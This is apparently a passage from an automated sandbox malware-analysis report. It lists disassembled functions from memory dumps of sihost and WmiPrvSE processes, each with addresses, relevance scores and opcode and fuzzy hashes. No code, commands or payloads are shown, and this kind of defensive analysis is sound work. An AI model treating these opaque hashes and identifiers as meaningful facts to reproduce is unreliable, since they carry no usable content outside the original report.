              • Instruction Fuzzy Hash: 5DF062B180E78E8FE75A9B3488292AD3FB0BF16201F4505BEE909C61D3DB699958C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF53234 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f0545882a4ef1ab2ba1c7c293217778585f53eca5e9c974ce8c6b07ffdbeb32
              • Instruction ID: bd2256d1fe12017379c1dab184a4ccb71bf64258a07598e8c1ce34c3c4147247
              • Opcode Fuzzy Hash: 0f0545882a4ef1ab2ba1c7c293217778585f53eca5e9c974ce8c6b07ffdbeb32
              • Instruction Fuzzy Hash: A8F0ECF1D0961D8FEB59DBBCC4996FC7BB1AF94301F14403AD909A26C1CA3A998CDB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5AD58 Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6e5ab38b77ca40ac08449ca6c6ad8e15c39fa0c4d5d0f2a212c32427f24963e2
              • Instruction ID: fcfa24d1731eb1194389a8b4b666b4a1fa81ac35a75a21382e9a358ba8926ca8
              • Opcode Fuzzy Hash: 6e5ab38b77ca40ac08449ca6c6ad8e15c39fa0c4d5d0f2a212c32427f24963e2
              • Instruction Fuzzy Hash: F1F044B0D4A51D8FEB96EB28C489BE9B7B1FF59300F5042A9C40DD3151CA35DD859F80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF526CD Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad6a4eb18d0b8a8a3585a41a8ae5eeeca0c27bfa353872d860b728c424ea1a5d
              • Instruction ID: 779e3264de27d98a0ac1d393c567c52b482d485ecd9c49a2d46080b62a985bf7
              • Opcode Fuzzy Hash: ad6a4eb18d0b8a8a3585a41a8ae5eeeca0c27bfa353872d860b728c424ea1a5d
              • Instruction Fuzzy Hash: 19F0C2B080A28E8FE76A9B3488192B93EA0FF05200F4005BAE909C50D2EB299858C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF581D1 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bea751201502bc83f5e77dbba07d716addb4272d7a263f8b4452496c4cadf96a
              • Instruction ID: fb5ef5eec754c3f286a422cc660226b3e18cbf71839c28771e6503e6fbf52798
              • Opcode Fuzzy Hash: bea751201502bc83f5e77dbba07d716addb4272d7a263f8b4452496c4cadf96a
              • Instruction Fuzzy Hash: C1F019F4D0A65E8FDBA6CB28C8447F977B4AF09301F1005E6954D92282CA399E898F44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF56E0B Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b137ff1cdc953ca7267bb7509444a9a0a7250f5b08052ee4f3ff02563c97c410
              • Instruction ID: d8ef8d843ae7cc1f4721f98f347a486a8d85b7a2dc5f1c25452fa44e201e3565
              • Opcode Fuzzy Hash: b137ff1cdc953ca7267bb7509444a9a0a7250f5b08052ee4f3ff02563c97c410
              • Instruction Fuzzy Hash: 2EF0FEF4E0961E8FDBA5DB28C8447A9B7F4AB18301F1001E5950DD3341CA349FC58F44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF50BA5 Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9c8f7af2ecaee26d9457d1d6c79a9b150f559f63631c182091aee7a14402dace
              • Instruction ID: cac91765b2d64f9d0ce2bf9dfb3c8294795351757344df1fc242f33ebcfb3525
              • Opcode Fuzzy Hash: 9c8f7af2ecaee26d9457d1d6c79a9b150f559f63631c182091aee7a14402dace
              • Instruction Fuzzy Hash: 79F0BDF0D0521E9ADB41DFB4C4896EDB7F1EF44315F10453ACA09EB295DB79AA48CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5BA62 Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000012.00000002.451690410.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_7ffbacf50000_sihost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ef33fd9f7a74b930893de0ab397cf34e537c179a896505af53d0efecad86fc2a
              • Instruction ID: fd7ba598e8527cf75cf50352af850d4b33fbaf7fe54cb666c47eda9ac7652e93
              • Opcode Fuzzy Hash: ef33fd9f7a74b930893de0ab397cf34e537c179a896505af53d0efecad86fc2a
              • Instruction Fuzzy Hash: B3D0E2B9A0882DCF8F40EFA8D8041ECB7B0FB58301B000032E90DE3140CB20A8248B40
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              Function 00007FFBACF3EE6E Relevance: 6.3, Strings: 5, Instructions: 73COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000016.00000002.465702055.00007FFBACF3E000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3E000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3e000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID: !$3$A$]$k
              • API String ID: 0-237419272
              • Opcode ID: 4ed21f01810f28e839933c5dc948fa3bafa8f8c08764cc0de8ff81975f4ea77f
              • Instruction ID: a2562dd371ac6718599d3681c550b8856a093a80e6418307e7d9c770a9ac0ff6
              • Opcode Fuzzy Hash: 4ed21f01810f28e839933c5dc948fa3bafa8f8c08764cc0de8ff81975f4ea77f
              • Instruction Fuzzy Hash: 6231F8B0D0A62A8BDBA9DF24C8997E9B7B1EF54310F0041E9D55DA7381CB35AE84CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3EC8D Relevance: 6.3, Strings: 5, Instructions: 60COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000016.00000002.465702055.00007FFBACF3E000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3E000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3e000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID: #$3$A$[$k
              • API String ID: 0-610135868
              • Opcode ID: 0166d72d2d2425c56ee383e5f9523df1833d9d6fed42b4a8471d3729c6deac92
              • Instruction ID: 92250d0c23ac8262f7813c9acc6c17bf683d6995c93b51f104a21ef7bd1cd09c
              • Opcode Fuzzy Hash: 0166d72d2d2425c56ee383e5f9523df1833d9d6fed42b4a8471d3729c6deac92
              • Instruction Fuzzy Hash: 9B21ECB0D0962D8BEB69DF25C8557E977B1BF54300F0041ADD81DA6381CB79AE84CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C3AD Relevance: 1.4, Strings: 1, Instructions: 173COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000016.00000002.465608515.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID: $K~
              • API String ID: 0-2883342327
              • Opcode ID: 9de682389cbf51f26719d87ce3778a86b5da02907fb7c664dafe38920de6a85d
              • Instruction ID: bb3718279078a3428a96e4b962511770c454d17d3d66c334a6b2c2db0e922f59
              • Opcode Fuzzy Hash: 9de682389cbf51f26719d87ce3778a86b5da02907fb7c664dafe38920de6a85d
              • Instruction Fuzzy Hash: E64185B7D1862A5AEB51BB7DF4050FE77D0DF81331F000637D698C9092DB25B48A9AE4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C35D Relevance: 1.4, Strings: 1, Instructions: 154COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000016.00000002.465608515.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID: $K~
              • API String ID: 0-2883342327
              • Opcode ID: 594943056593f0f9abb9387cc0282bb75712c1f5ae5dd63d05f735205797d572
              • Instruction ID: 1e284e2e2bd71ed353c02597b48371164e795ad4af7ed029813af4160fb44145
              • Opcode Fuzzy Hash: 594943056593f0f9abb9387cc0282bb75712c1f5ae5dd63d05f735205797d572
              • Instruction Fuzzy Hash: 4841B4B7D0862A56EB52BB7DF4050FA7BD0DF81331F000636D658C5092DF25B48A9AA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF44CA2 Relevance: .7, Instructions: 716COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 063f1e94d75a9c03f9022cc88b67360a00d42917d21cdace5fdee5a87b178d28
              • Instruction ID: c332a06a9562dd701dd6d0fd548a206fcc0bf1eee0e24e0a952cdcebd840cab1
              • Opcode Fuzzy Hash: 063f1e94d75a9c03f9022cc88b67360a00d42917d21cdace5fdee5a87b178d28
              • Instruction Fuzzy Hash: A0A148B2A0DA5A0FDB56EB3CD4985F57BE1EF46311B0401BBD549C71A3CE1AEC4A8780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42BF5 Relevance: .4, Instructions: 414COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 097681c86cf756af4035a85a0096d0f7f5e572e24e2c97221e5b77b490679a4b
              • Instruction ID: 881cf80ea470eb3dcb221e8738752e8b9e1e6205438c605404052aa5ef7c2a14
              • Opcode Fuzzy Hash: 097681c86cf756af4035a85a0096d0f7f5e572e24e2c97221e5b77b490679a4b
              • Instruction Fuzzy Hash: B8C1BBEBD0E1A50BE713A77DB8A51E97F90DF42331B4400B7D688CA097DE19D84E86A1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42C83 Relevance: .3, Instructions: 341COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5c6aa8569b7101d6af6ae117a91ff348e6c4a5002fe35b046a10e562b6dc2960
              • Instruction ID: 4d769fa411a530119e457b2da7d759051cbb25c2c5595502b6915ec8b95fdb26
              • Opcode Fuzzy Hash: 5c6aa8569b7101d6af6ae117a91ff348e6c4a5002fe35b046a10e562b6dc2960
              • Instruction Fuzzy Hash: 6FA1DAEBD0E2A50BE713A77CB8A51E56F90DF41370B4400B7D688CA097EE19DD4E8291
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42CAA Relevance: .3, Instructions: 316COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9db88452dc820359416067452b3b0645b67072b44d6337852b48e4677c0a682
              • Instruction ID: 6100305be119c43a2148ac90cc8c0566dc2c7ef58cdecba487d24a204edaae05
              • Opcode Fuzzy Hash: a9db88452dc820359416067452b3b0645b67072b44d6337852b48e4677c0a682
              • Instruction Fuzzy Hash: 2D91DBEBD0E2A60FE753A77CB8A51E56F90DF41270B4400B7D588CA097EE19DD4E8391
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4468D Relevance: .3, Instructions: 259COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e8e8ef1cb289ad27edc8652f8dc443444786c22abf762cd30680e4dde4168301
              • Instruction ID: 8defec52be259aa34e9d4c8b78c7113c7a27a9fbde42a3a84480c428887ab0fb
              • Opcode Fuzzy Hash: e8e8ef1cb289ad27edc8652f8dc443444786c22abf762cd30680e4dde4168301
              • Instruction Fuzzy Hash: 228160B0909A5D8FDB95EB78C8996ED7BF0FF59310F1001AAD40EE7292DE359845CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42F95 Relevance: .2, Instructions: 220COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 321af3b4d4ad5cbf469625dbcf1a5870b836d4c9024ea7efff74b13a64b24a2d
              • Instruction ID: 0f04d0b998fee5ee41bdaf60d9f593bcefda38795645bfbb50408c4715ae3c2c
              • Opcode Fuzzy Hash: 321af3b4d4ad5cbf469625dbcf1a5870b836d4c9024ea7efff74b13a64b24a2d
              • Instruction Fuzzy Hash: 9C9109B0D19A1D8EEB95EF78C9987ACB6B1FF58300F1045B9D40DE3292DB359988CB10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3BCE9 Relevance: .2, Instructions: 215COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465608515.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 32d79eb15db54fe3fcd8c8826b725e1533082f8200e1fd2c7bf2329258bd59e4
              • Instruction ID: 11cc3d2bf708ab2dba9f0407d200de842058b0b90a8fe5506215d2e7bcb21b1d
              • Opcode Fuzzy Hash: 32d79eb15db54fe3fcd8c8826b725e1533082f8200e1fd2c7bf2329258bd59e4
              • Instruction Fuzzy Hash: 2B7107B0D1951D9EEB95DBB8C4A86ECB7B1FF59300F5001BAD41DE3292DE35A8858B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3351F Relevance: .2, Instructions: 214COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a43a8a519de4e01f7fbf7509953f2363d01ef80a66c166194acf92e1c7837e48
              • Instruction ID: 89d8181f13e966a77505499d7f58a143c460170d9fb809b964d506d07814e8be
              • Opcode Fuzzy Hash: a43a8a519de4e01f7fbf7509953f2363d01ef80a66c166194acf92e1c7837e48
              • Instruction Fuzzy Hash: 3971A0B2E18A5D8FEB84EB6CE455BEDBBE1EF4A310F40017AC10DD7396DA641806CB51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF32035 Relevance: .1, Instructions: 146COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8770a6c908023bf5db6947e895bb6fdad77fb3f99cf600904099cdc1c6a519e3
              • Instruction ID: 5b4043a9e5e26b472253efaca08f03823262b061521df59b43d16af179aae06b
              • Opcode Fuzzy Hash: 8770a6c908023bf5db6947e895bb6fdad77fb3f99cf600904099cdc1c6a519e3
              • Instruction Fuzzy Hash: A74122F1A0D65A5FE746EB38D4891F87BE0EF45300F0501B6D82DC72A3DE2AE84A8341
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF318F4 Relevance: .1, Instructions: 138COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: af46e27fb9476c00cbb7315cb767367c7113da65fc65a68bd9af554f684d406d
              • Instruction ID: 05f1ee2c779854811f6c562637bda571aefcf823f6b3e210694ae43301f10a8f
              • Opcode Fuzzy Hash: af46e27fb9476c00cbb7315cb767367c7113da65fc65a68bd9af554f684d406d
              • Instruction Fuzzy Hash: CD41B270B187498FCB4DDE28C8954BA77E1FB98714B14857DD89AC3396CE35E812C781
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C450 Relevance: .1, Instructions: 134COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465608515.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a36aa3db3b69fb9b973ff76324ad221b34588ab294a726b065d0507d0e407836
              • Instruction ID: cc885b95372c2de196719ecda263e6c9277f2ecda86cac85e7cdce653136598f
              • Opcode Fuzzy Hash: a36aa3db3b69fb9b973ff76324ad221b34588ab294a726b065d0507d0e407836
              • Instruction Fuzzy Hash: FE41CAF6D0962A5AEB92BB7DE4080FD7BD0EF54321F000636D91DC5192DF26B48E96B0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF41E4D Relevance: .1, Instructions: 126COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f2352b6794962278cee154607ef6a301c0cbdf5a2fe5aad29cab3e26f76b6fdd
              • Instruction ID: 7c18de894a0645098a657a30a1d6917233d94742b8136453354974efb71f8379
              • Opcode Fuzzy Hash: f2352b6794962278cee154607ef6a301c0cbdf5a2fe5aad29cab3e26f76b6fdd
              • Instruction Fuzzy Hash: 79415CB4D1962D8FEB45EBA8C899AEDB7B1FF48300F400179D509E7292CF386845CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42B30 Relevance: .1, Instructions: 120COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3c24becce95e9513393e5546f1a04afc7ce4c9276c95ddc63b92f0a01dd0be61
              • Instruction ID: c94710223edf48e93cc04940599bbb53954c041e48caab3509420a22b054454e
              • Opcode Fuzzy Hash: 3c24becce95e9513393e5546f1a04afc7ce4c9276c95ddc63b92f0a01dd0be61
              • Instruction Fuzzy Hash: 7431B277E0852E4ADB10FBBCF4551EA77A0EF55332F00043BE689D6192DF24A8898B94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF330F5 Relevance: .1, Instructions: 117COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aca15422bf201d3e9bea25003fec2e4ebd4b8950585621439b5348895fc863fa
              • Instruction ID: ed71b62e9376ae03d18ad8c6105087fbd5b23a7dc0f0b9f773438f71d0c55de8
              • Opcode Fuzzy Hash: aca15422bf201d3e9bea25003fec2e4ebd4b8950585621439b5348895fc863fa
              • Instruction Fuzzy Hash: 9D418CF0D0A51A9BEB55EB78C4582FD77B0EF44300F00103AD819A6282CE3AE94E8B50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3CE29 Relevance: .1, Instructions: 113COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465608515.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dd78a28b9cf0116b0fd0af6778ee89b5f452842a98b6d1486da637d9b2d912dc
              • Instruction ID: 65d51e394bdf82896bd1d80d7b4d7aa8398b6c8ac300cedddadc82163810dc7f
              • Opcode Fuzzy Hash: dd78a28b9cf0116b0fd0af6778ee89b5f452842a98b6d1486da637d9b2d912dc
              • Instruction Fuzzy Hash: 93414BB0D096199EDB51DFB5C8486ED77F0EF18311F104276E818E7282DA39A948DB60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42B48 Relevance: .1, Instructions: 108COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: be29b02938f47a1dda6715ea3afb2230f683e5b5bf9808abaa08381b30095eb5
              • Instruction ID: 402c0004eaf63718c7c7448c83484f944145c63b886b7c4ebb8589607f241677
              • Opcode Fuzzy Hash: be29b02938f47a1dda6715ea3afb2230f683e5b5bf9808abaa08381b30095eb5
              • Instruction Fuzzy Hash: BE31AF76E0852E4ADB50FBBCF8151EE77A0EF55321F10043BE689D6192DF24A8898B94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF322C7 Relevance: .1, Instructions: 94COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a32b3e0b368ed2f043c69e242d5b26d0150ac8c8116c2396d858f99cd914da46
              • Instruction ID: ef2d6f28cf46391597d720d452c237078c20b2be8cb28d5d819c173caa8c4510
              • Opcode Fuzzy Hash: a32b3e0b368ed2f043c69e242d5b26d0150ac8c8116c2396d858f99cd914da46
              • Instruction Fuzzy Hash: F0313FF1D0A51A9BEB65DB30DC487FCB3B1BF05300F5041B9C86D96392DE79A9488B04
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42B70 Relevance: .1, Instructions: 92COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e2b6038894865a1838e7342b2154ccd781b49aa5bec2bf3c5b637bf3ebc28eee
              • Instruction ID: f62cdf5d513b37567ab83dbfd2d4235efc43312e02d3021c1e60758990595d2b
              • Opcode Fuzzy Hash: e2b6038894865a1838e7342b2154ccd781b49aa5bec2bf3c5b637bf3ebc28eee
              • Instruction Fuzzy Hash: 5921A176E0852E4ADF50FFBCE8451EE77E1EF58321F10043BE689D6182DF24A4898B94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C458 Relevance: .1, Instructions: 89COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465608515.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f49b61ba35edaa5bfcc8e7c52dd2b96273e42fde19b4a2af0785f57e5f4db578
              • Instruction ID: 42f3670799c205a40c82fbbfcded8155c4560f190b4e4f7fe0dc43f31baa24b8
              • Opcode Fuzzy Hash: f49b61ba35edaa5bfcc8e7c52dd2b96273e42fde19b4a2af0785f57e5f4db578
              • Instruction Fuzzy Hash: 2221EAF6D0966B5AEB92BB7DE4080FE3BD0EF40320F000636D91CC5192DF25B48D96A4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420D0 Relevance: .1, Instructions: 81COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1152ae809a4dfa78c7252e7bf4eb2bc3a52fc504ed4414f628ed3e075e1fac18
              • Instruction ID: 47e33c6ac8d107923f3e0be9e938d059ed492a3b270e65ed83e95d6b9ea1a9ca
              • Opcode Fuzzy Hash: 1152ae809a4dfa78c7252e7bf4eb2bc3a52fc504ed4414f628ed3e075e1fac18
              • Instruction Fuzzy Hash: 6721DEFAA0951D8BE751FB7CD98A1F97BA0EF85321F0504BBCA08C7052DA25E54A8790
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4239A Relevance: .1, Instructions: 81COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
